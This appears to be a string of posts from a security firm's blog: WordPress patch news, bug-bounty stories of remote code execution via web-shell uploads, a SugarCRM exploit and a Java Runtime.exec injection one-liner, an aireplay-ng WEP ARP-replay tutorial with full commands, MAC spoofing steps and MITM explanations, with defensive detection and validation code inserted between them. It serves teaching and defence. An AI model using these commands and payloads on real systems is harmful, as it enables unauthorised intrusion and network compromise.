Airzero Sec

Website Security

The most recent WordPress security update corrects a number of issues, among them XSS and SQL injection bugs. WordPress's developers have released a security-focused update that fixes four security problems in the content management system. WordPress 5.8.3 addresses cross-site scripting (XSS) and SQL injection vulnerabilities affecting WordPress versions 3.7 to 5.8. The first fix is for a stored XSS via post slugs, found by SonarSource's Karim El Ouerghemmi and Simon Scannell. "We uncovered and reported a stored XSS vulnerability in WordPress that might allow an authenticated attacker to inject a JavaScript payload into post slugs," El Ouerghemmi told The Daily Swig.

"After infecting the administrative dashboard, this payload might be used to steal administrator accounts and undermine the installation." "We disclosed the issue more than three years ago, and we're delighted to see it's been addressed," El Ouerghemmi continued. Next Tuesday, SonarSource aims to publish the technical details of this vulnerability in a blog post, along with information on how it could have been exploited without requiring any user credentials if an older version of a widely used plugin is installed. Separately, Simon Scannell of SonarSource identified a problem with "object injection in some multi-site deployments," which was also fixed in the WordPress 5.8.3 release.

The same version addresses a SQL injection vulnerability in WP_Query, found by GiaoHangTietKiem JSC's ngocnb and khuyenn and reported through Trend Micro's Zero Day Initiative (ZDI) program.

The Daily Swig contacted the ZDI for comment. We haven't heard anything yet, but we'll keep you updated as more information becomes available. WordPress 5.8.3 is a security-focused interim release that doesn't include any new features or functionality.

Airzero Sec is at the forefront of security innovation, helping you overcome the toughest security challenges. Please contact us if you have any questions about the recent WordPress security update that resolves XSS and SQL injection issues.

Email: [email protected]


Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/


When I talk with newbie security researchers and bug bounty hunters, they often tell me that they don't consider themselves capable of finding remote code execution vulnerabilities because those are supposed to be super complicated. Because of this misconception, many of them never really try to find one, or stop looking at some point. I think the reason behind it is that most public write-ups are indeed about very complex bugs, where the RCE is reached by chaining several different root causes together. While I am continuously impressed by these well-written write-ups and creative exploitation techniques, I still keep looking for the easy ones too when I am testing. So I decided to share some real-world examples I found on Synack targets over time, which were especially low-hanging fruit and could have been found and exploited by anyone. Just a few simple tricks can turn a vulnerability that seems unexploitable at first into a real one.

Unrestricted File Upload 1:

On a host test, I found a login page under the /support/ directory while fuzzing directories. Using the JavaScript files loaded by that login page, I noted some post-login endpoints, and by requesting them directly I discovered that some administrator pages were accessible without logging in. One of them was a file upload page, which also accepted .asp files. Sounds easy, right? Well, after uploading, I tried to locate the uploaded files both by fuzzing and by reading the JavaScript files, but that was not feasible. I then tried to upload the file into upper directories by attempting a directory traversal in the file name, and it worked. I used the "Fuzzing-Path Traversal" dictionary for a convenient automated attack to find the vulnerability. But be warned: while this does no harm on file retrieval functionality, it can on file creation, update or deletion functionality, since every traversal payload will create a new file on the server.

Unrestricted File Upload 2:

On a web application I was testing, with the help of Google dorks such as site:domain.com ext:asp I found a web form that did not exist in the application's site map or UI at all. That web form also had a file upload field, which accepted .asp files. This time the problem was again locating the uploaded file. Whatever I did, I couldn't find the upload location, and I also didn't find any vulnerability to chain with, such as the directory traversal in the first example. So I went back to the form I had been filling in. It was an application form for something or other. I filled in the whole form and submitted it. A while later, I got an email from the web application about my request. That email included all the data I had entered in the form, including a link to my uploaded document, which was hosted on the same in-scope application. Clicking the link executed my web shell just like in the first example, and again brought a payout of almost 3k from the platform.
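Both upload stories above have the same root cause on the server side: the application accepted an executable extension, and in the first case also a file name containing traversal sequences. As an added example that is not part of the original post, this is how an upload handler can reject both classes of input before anything is written to disk. The allowed and forbidden extension sets and the resolve_upload_path helper are my own assumptions for the example, not code from the applications described.

```python
import os
import re
import unicodedata

# Constructed policy for this example; tune both sets to the deployment.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "txt"}
# Extensions that must never appear anywhere in the name, not even as a middle
# segment (shell.asp.txt), because some servers dispatch on the first one they see.
EXECUTABLE_EXTENSIONS = {"asp", "aspx", "asa", "php", "phtml", "jsp", "jspx", "cgi", "pl", "py", "sh"}

# One leading alphanumeric, a bounded run of safe characters, then one or more
# dotted alphanumeric segments. No slashes, backslashes, NUL, ';' or '%' survive.
_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,99}(\.[A-Za-z0-9]{1,10})+")


def validate_upload_name(client_name: str) -> str:
    """Return the name unchanged if it is safe to store, else raise ValueError."""
    name = unicodedata.normalize("NFKC", client_name)
    if not _NAME_RE.fullmatch(name):
        # Catches '..', '/', '\\', empty names, 'shell.asp;.jpg' and '%00' tricks
        raise ValueError("filename contains disallowed characters or structure")
    segments = [s.lower() for s in name.split(".")[1:]]
    if any(seg in EXECUTABLE_EXTENSIONS for seg in segments):
        raise ValueError("executable extension not allowed")
    if segments[-1] not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not in allow-list")
    return name


def is_safe_upload_name(client_name: str) -> bool:
    """Boolean convenience wrapper around validate_upload_name."""
    try:
        validate_upload_name(client_name)
        return True
    except ValueError:
        return False


def resolve_upload_path(upload_root: str, client_name: str) -> str:
    """Absolute destination path, guaranteed to lie inside upload_root."""
    safe = validate_upload_name(client_name)
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, safe))
    # Defence in depth: even a validated name must not resolve outside the root.
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("resolved path escapes upload root")
    return dest
```

Keeping the upload directory outside the web root (or served with script execution disabled) is the complementary control: even if a name slips through, the server never executes what it stored.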

Known RCE Exploitation:

On a host test, I found a version of the SugarCRM application running on an in-scope IP address. Checking the version of the software and searching Google for vulnerabilities in it, I quickly discovered that this version was exposed to a PHP code execution vulnerability. Well, while the exploit executed, no session was created. I tried other msf payloads from the framework, but none of them worked, probably because a firewall was filtering both incoming and outgoing connections for bind and reverse shells. So I started reading the exploit code and analyzed it. The exploit was creating a randomly named file under the /custom/ directory and then connecting back with a reverse shell to the given IP address from that generated PHP file. When I requested the file created by my exploitation attempts, it returned an empty response, meaning that the file had actually been created and the exploit had worked.

After that, in the code below, I noticed that a special payload header, base64 encoded, is sent to the server for that file in order to complete the exploitation, via this code:

which encodes the payload @system(whoami); consisting of:

  • system, the PHP function for running an OS command.
  • whoami, the OS command whose result is returned.

Requesting the file generated by Metasploit with the payload header as described returned the output of the whoami command, along with a payout of around 3k again. When I was attempting to delete my planted web shells for the clean-up process on this.

Application Level Command Injection:

This one is a little more complex than the other examples, but it still needs to be in this post because the exploitation method is different. On a web application test, there was a functionality for attaching custom expressions to the issues created by users. Since the extension was .do, the underlying technology was Java, and I wondered whether, at the input scripting stage, they were also allowing Java functionality in addition to the custom-defined functions.

I appended the Java one-liner new java.io.DataInputStream(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).readLine() under the custom addMessage function, so that it would return the output of the command to me, and saved the expression.
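The root cause in this last example is that a user-supplied "custom expression" was handed to a full language runtime, so everything the runtime can do (here Runtime.exec) became reachable from the expression field. The safe design is to parse the expression and evaluate only an allow-list of node types, so attribute access, imports and arbitrary calls have no representation at all. The Python evaluator below is an added example, not the application's code; the allowed operators and functions are assumptions chosen for illustration.

```python
import ast
import operator
from typing import Any, Dict

# Allow-list of what a "custom expression" may do. Constructed policy for this
# example; anything not listed here is rejected before it is evaluated.
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Mod: operator.mod,
}
_CMP_OPS = {
    ast.Eq: operator.eq, ast.NotEq: operator.ne, ast.Lt: operator.lt,
    ast.LtE: operator.le, ast.Gt: operator.gt, ast.GtE: operator.ge,
}
_FUNCS = {"len": len, "upper": str.upper, "lower": str.lower, "min": min, "max": max}


class UnsafeExpression(ValueError):
    """Raised for any construct outside the allow-list."""


def safe_eval(expr: str, variables: Dict[str, Any]) -> Any:
    """Parse `expr` and evaluate it by walking the AST against an allow-list.

    Unlike handing the string to a language runtime, there is no path from
    here to attribute lookups, imports, subscripts or arbitrary calls.
    """
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise UnsafeExpression(f"syntax error: {exc.msg}") from None
    return _walk(tree.body, variables)


def _walk(node: ast.AST, variables: Dict[str, Any]) -> Any:
    if isinstance(node, ast.Constant) and isinstance(node.value, (bool, int, float, str)):
        return node.value
    if isinstance(node, ast.Name):
        if node.id in variables:
            return variables[node.id]
        raise UnsafeExpression(f"unknown variable {node.id!r}")
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_walk(node.left, variables), _walk(node.right, variables))
    if isinstance(node, ast.Compare) and len(node.ops) == 1 and type(node.ops[0]) in _CMP_OPS:
        return _CMP_OPS[type(node.ops[0])](_walk(node.left, variables),
                                           _walk(node.comparators[0], variables))
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id in _FUNCS and not node.keywords):
        return _FUNCS[node.func.id](*[_walk(arg, variables) for arg in node.args])
    # Attribute access (x.__class__), subscripts, lambdas, comprehensions and
    # any call not in _FUNCS all end up here.
    raise UnsafeExpression(f"disallowed construct: {type(node).__name__}")


def is_expression_allowed(expr: str, variables: Dict[str, Any]) -> bool:
    """True if the expression evaluates within the allow-list, False otherwise."""
    try:
        safe_eval(expr, variables)
        return True
    except UnsafeExpression:
        return False
```

The same principle applies to Java expression languages: evaluate user expressions with a restricted resolver that exposes only the functions the feature needs, never with a general-purpose script engine.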

If you have any doubts about the above topic, don't hesitate to contact us. Airzero Sec will be your digital partner. Email id: [email protected]


What is a MITM attack?

Man-in-the-middle attacks are a common type of cyber threat that lets an attacker eavesdrop on the communication between two parties. The attack takes place between two legitimately communicating hosts, allowing the attacker to "listen" to a conversation they should normally not be able to hear, hence the name "man-in-the-middle".

What are the types of MITM attacks?

Rogue Access Point :

Machines equipped with wireless cards will often try to auto-connect to the access point broadcasting the strongest signal. Attackers can set up their own wireless access point and trick nearby devices into joining its network. All of the victim's network traffic can then be manipulated by the attacker. This is dangerous because the attacker does not even have to be on a trusted network to do it; the attacker simply needs to be physically close enough.

ARP Spoofing

ARP is the Address Resolution Protocol. It is used to resolve IP addresses to physical MAC addresses in a local area network. When a host needs to talk to a host with a given IP address, it checks its ARP cache to resolve the IP address to a MAC address. If the address is not known, a request is broadcast asking for the MAC address of the device with that IP address.

An attacker wishing to pose as another host can respond to requests it should not be responding to with its own MAC address. With a few carefully placed packets, an attacker can sniff the private traffic between two hosts. Valuable information can be extracted from that traffic, such as the session tokens being exchanged, allowing full access to application accounts that the attacker should not be able to access.
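From the defender's side, ARP spoofing leaves a visible trace: an IP address that suddenly answers from a different MAC, or one MAC that starts answering for several IPs. The detector below is an added example, not code from the original post; the ARP replies are a constructed sample and the pinned gateway binding is an assumed policy entry.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class ArpReply:
    ts: float        # seconds since capture start
    sender_ip: str   # IP address the reply claims to own
    sender_mac: str  # MAC address the reply says that IP lives at


# Constructed sample, not a real capture. The gateway 192.168.1.1 is genuinely
# aa:bb:cc:00:00:01; from t=30 a second station (cc:dd:ee:00:00:99) starts
# answering for the gateway's IP and then for the client 192.168.1.20 as well.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(5.0, "192.168.1.20", "aa:bb:cc:00:00:20"),
    ArpReply(30.0, "192.168.1.1", "CC:DD:EE:00:00:99"),
    ArpReply(31.0, "192.168.1.20", "cc:dd:ee:00:00:99"),
    ArpReply(60.0, "192.168.1.1", "cc:dd:ee:00:00:99"),
]

# Assumed policy table: hosts whose IP-to-MAC binding is pinned (e.g. the gateway).
TRUSTED_BINDINGS = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def detect_arp_spoofing(replies: Iterable[ArpReply],
                        trusted: Optional[Dict[str, str]] = None) -> List[dict]:
    """Return one alert dict per suspicious reply.

    Three signals are used:
      policy_mismatch  - a pinned IP was answered by a MAC other than the trusted one
      mac_changed      - an IP's MAC differs from what was seen earlier in the capture
      mac_claims_many  - one MAC began answering for a second IP address
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    seen: Dict[str, str] = {}
    ips_by_mac: Dict[str, set] = defaultdict(set)
    alerts: List[dict] = []

    for r in replies:
        mac = r.sender_mac.lower()
        if r.sender_ip in trusted and trusted[r.sender_ip] != mac:
            alerts.append({"ts": r.ts, "kind": "policy_mismatch", "ip": r.sender_ip,
                           "mac": mac, "expected": trusted[r.sender_ip]})
        prev = seen.get(r.sender_ip)
        if prev is not None and prev != mac:
            alerts.append({"ts": r.ts, "kind": "mac_changed", "ip": r.sender_ip,
                           "mac": mac, "previous": prev})
        seen[r.sender_ip] = mac
        # Fire once, at the moment a MAC first answers for a second IP.
        before = len(ips_by_mac[mac])
        ips_by_mac[mac].add(r.sender_ip)
        if before == 1 and len(ips_by_mac[mac]) == 2:
            alerts.append({"ts": r.ts, "kind": "mac_claims_many", "ip": r.sender_ip,
                           "mac": mac, "claimed": sorted(ips_by_mac[mac])})
    return alerts
```

On managed switches the same idea is enforced inline by Dynamic ARP Inspection against the DHCP snooping table; on hosts, static ARP entries for the gateway remove the "mac_changed" possibility entirely.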

mDNS Spoofing

Multicast DNS is similar to DNS, but it is done on a local area network using broadcasts, like ARP. This makes it a prime target for spoofing attacks. The local name resolution system is meant to make configuring network devices very simple. Users don't have to know exactly which addresses their devices should be communicating with; they let the system resolve it for them. Devices such as TVs, printers and entertainment systems make use of this protocol since they are typically on trusted networks. When an app needs to know the address of a certain device, such as tv.local, an attacker can easily respond to that request with fake data, telling it to resolve to an address the attacker controls. Since devices keep a local cache of addresses, the victim will then see the attacker's device as trusted for a period of time.

DNS Spoofing

Similar to the way ARP resolves IP addresses to MAC addresses on a LAN, DNS resolves domain names to IP addresses. In a DNS spoofing attack, the attacker attempts to introduce corrupt DNS cache data to a host in order to impersonate another host using its domain name, such as www.onlinebanking.com. This leads to the victim sending sensitive data to a malicious host while believing they are sending it to a trusted source. An attacker who has already spoofed an IP address could have a much easier time spoofing DNS simply by resolving the address of a DNS server to the attacker's address.

What is the MITM attack technique?

Sniffing

Attackers use packet capture tools to inspect packets at a low level. Using specific wireless devices that can be put into monitor or promiscuous mode allows an attacker to see packets that are not intended for it, such as packets addressed to other hosts.

Packet Injection

An attacker can also leverage their device's monitor mode to inject malicious packets into data communication streams. The packets can blend in with valid data communication streams, appearing to be part of the communication but malicious in nature. Packet injection usually involves first sniffing to determine how and when to craft and send packets.

Session Hijacking

Most web applications use a login mechanism that generates a temporary session token to be used for subsequent requests, so that the user does not have to type a password on every page. An attacker can sniff sensitive traffic to identify the session token for a user and use it to make requests as that user. The attacker does not need to spoof anything once they have a session token.

SSL Stripping

Since using HTTPS is a real safeguard against ARP or DNS spoofing, attackers use SSL stripping to intercept packets and alter their HTTPS-based address requests to go to the HTTP equivalent endpoint, forcing the host to make requests to the server unencrypted. Sensitive information can then be leaked in plain text.

How to detect a man in the middle attack?

Detecting a man-in-the-middle attack can be hard without taking the proper steps. If you aren't actively checking whether your communications have been intercepted, a man-in-the-middle attack can potentially go unnoticed until it's too late. Checking for proper page authentication and implementing some sort of tamper detection are typically the key methods for detecting a possible attack, but these procedures might require extra forensic analysis after the fact. It's important to take proactive measures to prevent MITM attacks before they occur, rather than attempting to detect them while they are actively happening. Being aware of your browsing practices and recognizing potentially harmful areas can be essential to maintaining a secure network. Below, we have included five of the best practices to prevent MITM attacks from compromising your communications.

What are the practices to prevent man-in-the-middle attacks?

Strong WEP/WAP Encryption on Access Points

Having a strong encryption mechanism on wireless access points prevents unwanted users from joining your network just by being nearby. A weak encryption mechanism can allow an attacker to force his way into a network and begin man-in-the-middle attacking. The stronger the encryption implementation, the safer.

Strong Router Login Credentials

It's essential to make sure your default router login is changed. Not just your Wi-Fi password, but your router login credentials. If an attacker finds your router login credentials, they can change your DNS servers to their malicious servers. Or even worse, infect your router with malicious software.

Virtual Private Network

VPNs can be used to create a secure environment for sensitive information within a local area network. They use key-based encryption to create a subnet for secure communication. This way, even if an attacker happens to get onto a shared network, he will not be able to decipher the traffic in the VPN.

Force HTTPS

HTTPS can be used to communicate securely over HTTP using a public-private key exchange. This prevents an attacker from making any use of the data he may be sniffing. Websites should only use HTTPS and not provide HTTP alternatives. Users can install browser plugins to enforce always using HTTPS on requests.
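The session hijacking and SSL stripping sections above, together with this one, come down to a few response properties a defender can check mechanically: plain HTTP must only redirect to HTTPS, HTTPS responses must carry a long-lived HSTS policy, and session cookies must be marked Secure and HttpOnly so that a stripped connection or an injected script cannot read them. The audit function below is an added example, not code from the original post; the request URLs, headers and cookies are constructed samples.

```python
import re
from typing import Dict, List, Sequence

ONE_YEAR = 31536000  # HSTS max-age (seconds) that browsers and preload lists expect


def audit_https_response(request_url: str, status: int, headers: Dict[str, str],
                         set_cookies: Sequence[str] = ()) -> List[str]:
    """Return findings that leave a client exposed to SSL stripping or session theft.

    headers: single-valued response headers (names are matched case-insensitively).
    set_cookies: every Set-Cookie value, since one response may carry several.
    """
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    if request_url.lower().startswith("http://"):
        # A plain-HTTP endpoint must only redirect to HTTPS, never serve content.
        location = h.get("location", "")
        if not (300 <= status < 400 and location.lower().startswith("https://")):
            findings.append("plain HTTP served content instead of redirecting to HTTPS")
        if "strict-transport-security" in h:
            # Browsers ignore HSTS received over insecure transport (RFC 6797).
            findings.append("HSTS header sent over HTTP is ignored by browsers")
    else:
        hsts = h.get("strict-transport-security")
        if hsts is None:
            findings.append("missing Strict-Transport-Security header")
        else:
            m = re.search(r"max-age\s*=\s*(\d+)", hsts, re.IGNORECASE)
            max_age = int(m.group(1)) if m else 0
            if max_age < ONE_YEAR:
                findings.append(f"HSTS max-age {max_age} is shorter than one year")
            if "includesubdomains" not in hsts.lower():
                findings.append("HSTS lacks includeSubDomains")

    for cookie in set_cookies:
        parts = [p.strip() for p in cookie.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure (would be sent over stripped HTTP)")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly (readable by injected script)")
    return findings
```

HSTS only protects a browser that has already seen the policy over HTTPS once; submitting the domain to the HSTS preload list closes that first-visit window, which is exactly where SSL stripping operates.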

Public Key Pair Based Authentication

Man-in-the-middle attacks typically involve spoofing something or other. Public key pair based authentication like RSA can be used in various layers of the stack to help ensure that the parties you are communicating with are actually the parties you want to be communicating with.

If you have any doubts about this topic, or need advice and the best services and consultation against MITM attacks, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]


The classic ARP request replay attack is the most effective way to generate new initialization vectors, and it works very reliably. The program listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each packet repeated by the access point has a new IV. It is all these new initialization vectors that allow you to determine the WEP key.

What is ARP?

ARP is the Address Resolution Protocol: a TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.

What is the usage of ARP?

The basic usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

  • -3 means classic ARP request replay
  • -b 00:13:10:30:24:9C is the access point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • ath0 is the wireless interface name

The next usage is:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

Where:

  • -3 means classic ARP request replay
  • -b 00:13:10:30:24:9C is the access point MAC address
  • -h 00:11:22:33:44:55 is the source MAC address
  • -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
  • ath0 is the wireless interface

The next usage is:

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

  • -2 means interactive frame selection
  • -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay

What are the examples of the usage?

For all of the examples below, use airmon-ng to put your card into monitor mode first. You cannot inject packets unless it is in monitor mode.

For this type of attack, you need either the MAC address of an associated client, or a fake MAC address from another attack. The simplest and fastest way is to use the MAC address of an associated client, which can be obtained with airodump-ng. The reason for using an associated MAC address is that the access point will only accept and repeat packets whose sending MAC is "associated".

You may have to wait a few seconds, or even longer, until an ARP request appears. This type of attack will fail if there is no traffic.

Enter the command below:

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system responds:

Saving ARP requests in replay_arp-0219-123051.cap

You should also start airodump-ng to capture the replies.

Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initially the last line will look like this: Read 39 packets, sent 0 packets...

Then, once the attack is in progress, the zeroes become the actual counts as in the full sample given above. You can also confirm this by running airodump-ng to capture the IVs being created. It should show the data count increasing rapidly for the specific access point.

The second example reuses the captured ARP from the example above. You will notice that it said the ARP requests were being saved in "replay_arp-0219-123051.cap". So rather than waiting for a new ARP, we simply continue to use the old ones with the "-r" parameter:

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds like this:

Size: 86, FromDS: 0, ToDS: 1 (WEP)
BSSID  =  00:14:6C:7E:40:80
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:0F:B5:88:AC:82
0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
0x0010:  ffff ffff ffff 7092 e627 0000 7238 937c  ......p..'..r8.|
0x0020:  8011 36c6 2b2c a79b 08f8 0c7e f436 14f7  ..6.+,.....~.6..
0x0030:  8078 a08e 207c 17c6 43e3 fe8f 1a46 4981  .x.. |..C....FI.
0x0040:  947c 1930 742a c85f 2699 dabe 1368 df39  .|.0t*._&....h.9
0x0050:  ca97 0d9e 4731                           ....G1
Use this packet ? y

You answer "y" and then your device will start injecting:

Saving chosen packet in replay_src-0219-123117.cap

You should also start airodump-ng to capture the replies.

 Sent 3181 packets...

Alternatively, you can continue with the form shown in the Usage section above:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0

At this point, if you have not already done so, start airodump-ng to capture the IVs being generated. The data count should be increasing continuously.

When you are doing this at home, to create an ARP packet to start the ARP injection, simply ping a non-existent IP on the network.
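The attack described above has a distinctive signature for a wireless IDS: the same encrypted frame body, from the same source station to the same BSSID, repeated hundreds of times per second, whereas genuine ARP traffic produces distinct frames seconds apart. The detector below is an added example, not code from the original post or from the aircrack-ng project; the frame summaries are a constructed sample in which body identifiers stand in for a hash of each frame body.

```python
from collections import defaultdict
from typing import Dict, List, Sequence, Tuple

# Constructed frame summaries, not a real capture: (timestamp_ms, src_mac, bssid, body_id).
# body_id stands in for a hash of the encrypted frame body; a replayed frame carries
# the same body every time, while genuine traffic differs from frame to frame.
Frame = Tuple[int, str, str, str]


def build_sample_frames() -> List[Frame]:
    """Four genuine ARP frames 7 s apart, then one of them replayed at 100 frames/s."""
    src, bssid = "00:0f:b5:88:ac:82", "00:14:6c:7e:40:80"
    genuine = [(i * 7000, src, bssid, f"body{i}") for i in range(4)]
    replayed = [(40000 + i * 10, src, bssid, "body1") for i in range(300)]
    return genuine + replayed


def detect_frame_replay(frames: Sequence[Frame], window_ms: int = 1000,
                        threshold: int = 50) -> List[dict]:
    """Flag (src, bssid, body) tuples seen more than `threshold` times within any
    sliding window of `window_ms`. Returns one alert per offending tuple."""
    times_by_key: Dict[Tuple[str, str, str], List[int]] = defaultdict(list)
    for ts, src, bssid, body in frames:
        times_by_key[(src, bssid, body)].append(ts)

    alerts: List[dict] = []
    for (src, bssid, body), times in times_by_key.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it spans at most window_ms
            while times[end] - times[start] > window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts.append({"src": src, "bssid": bssid, "body": body, "peak_per_window": peak})
    return alerts
```

The threshold is deliberately generous: a real client never needs to resend an identical ARP request fifty times in a second, so any hit is worth investigating. The durable fix, of course, is not detection but retiring WEP for WPA2 or WPA3, which do not reuse keystream in this way.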

If you have any doubts about this topic, or need advice and the best services and consultation about the ARP request replay attack, feel free to contact us. AIRZERO SEC will be your strong digital solution. Email id: [email protected]


Changing the MAC address, also known as MAC address spoofing, is useful in some situations, which we will discuss later in the conclusion of this blog.

The main requirement for this spoofing is a Linux terminal.

Steps needed to change the MAC address:

  • The first step is to open your terminal and enter

    ifconfig | grep HWaddr

  • To change your MAC address temporarily, we need to switch off the network interface first by running the command below

    ifconfig eth0 down

  • The next step is to configure the new MAC address

    ifconfig eth0 hw ether 00:00:00:00:00:02

  • Next we switch the network interface on again

    ifconfig eth0 up

  • In the last step we check again whether our MAC has changed or not. The following steps show how to change the MAC address permanently.

  • Kali Linux is based on Debian. In Debian all the network interfaces are configured in

    /etc/network/interfaces

  • We will edit /etc/network/interfaces. In this blog I will use the pico text editor, but you can choose any text editor.

    pico /etc/network/interfaces

  • Now we add one line of configuration to change our MAC address permanently

    pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

  • If we want to restore the default MAC address, just add a # sign in front of the command from the step above.

    #pre-up ifconfig eth0 hw ether 00:00:00:00:00:02
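The persistent variant of the procedure above leaves evidence in /etc/network/interfaces, which is also where an administrator auditing a fleet would look for it. The small audit below is an added example, not code from the original post; it parses a constructed interfaces file, reports every pre-up MAC override (active or commented out) and checks whether the chosen address sets the locally-administered bit, which is the IEEE convention for addresses that were not assigned by a vendor.

```python
import re
from typing import List

# Constructed sample of /etc/network/interfaces, not taken from any real host.
# eth0 carries the active override from the steps above; eth1 shows the
# commented-out line left behind after restoring the default MAC.
SAMPLE_INTERFACES = """\
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp
    pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

auto eth1
iface eth1 inet dhcp
    #pre-up ifconfig eth1 hw ether 02:11:22:33:44:55
"""

_PREUP_RE = re.compile(r"^\s*(#?)\s*pre-up\s+ifconfig\s+(\S+)\s+hw\s+ether\s+(\S+)\s*$")
_MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def is_locally_administered(mac: str) -> bool:
    """True if the U/L bit (0x02 of the first octet) is set, i.e. the address is
    declared as locally assigned rather than vendor (OUI) assigned."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def audit_interfaces(text: str) -> List[dict]:
    """List every pre-up MAC override in an interfaces file, active or commented out."""
    findings: List[dict] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _PREUP_RE.match(line)
        if not m:
            continue
        commented, iface, mac = m.groups()
        valid = bool(_MAC_RE.match(mac))
        findings.append({
            "line": lineno,
            "iface": iface,
            "mac": mac.lower(),
            "active": commented == "",
            "valid_mac": valid,
            "locally_administered": valid and is_locally_administered(mac),
        })
    return findings
```

Note that 00:00:00:00:00:02, the value used in the steps above, has the locally-administered bit clear, so it presents itself as a vendor-assigned address under the OUI 00:00:00; network access control that checks OUI registrations will treat such an address differently from one like 02:11:22:33:44:55.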

Conclusion:

Changing MAC addresses is mainly used for privacy and to prevent tracking of your hardware details in the local network. Some network administrators implement blocking rules in the proxy and router based on the MAC address. To ensure interoperability and avoid being blocked by a proxy or router blacklist rule, we can as a last resort change our MAC address.

If you have any questions about this topic, or need advice and the best services and consultation against cyber problems, feel free to contact us. AIRZERO SEC will be your strong firewall. Email id: [email protected]


The number of people with cybersecurity skills is rising, and more than ever, organizations need security professionals to protect their networks and devices. So whether you're just a beginner in cybersecurity or an established professional, you constantly need to keep practicing and sharpening your hacking skills.

Penetration testing, also known as a pen test, pentest or ethical hacking, is an authorized simulated cyber attack on a computer system, performed to evaluate the security of that system. This is not to be confused with a vulnerability assessment. The test is performed to identify weaknesses, including the potential for unauthorized parties to gain access to the system's features and data, as well as strengths, enabling a full risk assessment to be completed.

The main websites are:

  • Hack the box
  • CTFlearn
  • bWAPP
  • Hack this site
  • Google Gruyere
  • Try2hack
  • WebGoat
  • RootMe

What about Hack the box?

Hack The Box is a massive online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills. Hack The Box is the world's largest hacking community, where you learn and track your progress. You also get invited to hack websites using your own hacking style.

What about CTFlearn?

CTFlearn is another hugely popular ethical hacking platform. Billed as "The most beginner-friendly way to get into hacking", CTFlearn boasts a worldwide following of over 70,000 people who are there to learn, practice and compete.

The platform's name derives from Capture The Flag, which is popular in the hacking community for its content and its reputation as a favorite cybersecurity challenge for beginners as well as professional attackers. CTFlearn also features challenges and competitions that give users the ability to act as both attacker and defender.

What about bWAPP?

bWAPP is an open-source, deliberately insecure web application. It helps security enthusiasts, developers and students to discover and prevent web vulnerabilities. bWAPP prepares you to conduct successful penetration testing and more. It has a large number of web vulnerabilities and covers all major known bugs. It can also be run with WAMP and XAMPP. Another option is to install bee-box, a custom Linux VM that comes pre-installed with bWAPP.

What about Hack This Site?

This is a free, safe and legal training platform for hackers to test and expand their ethical hacking skills with challenges and more. They are more than just another hacker wargames site. They have a community devoted to learning and sharing ethical hacking knowledge, technical hobbies and programming expertise, with many active projects in development. It offers numerous different challenges that cover beginner as well as advanced hacking skills. The challenges are fun and engaging, with real-life scenarios and different approaches. Each challenge has a thread on the forum where you can discuss it with other members of the community and get resources to solve the puzzle faster.

What about Google gruyere?

Gruyere has a variety of security bugs ranging from cross-site scripting and cross-site request forgery to information disclosure, denial of service and remote code execution. The goal of this codelab is to guide you through finding some of these bugs and learning ways to fix them, both in Gruyere and in general.

What about try2hack?

This website provides several security-oriented challenges for your entertainment. It is actually one of the oldest challenge sites still around.

What about WebGoat?

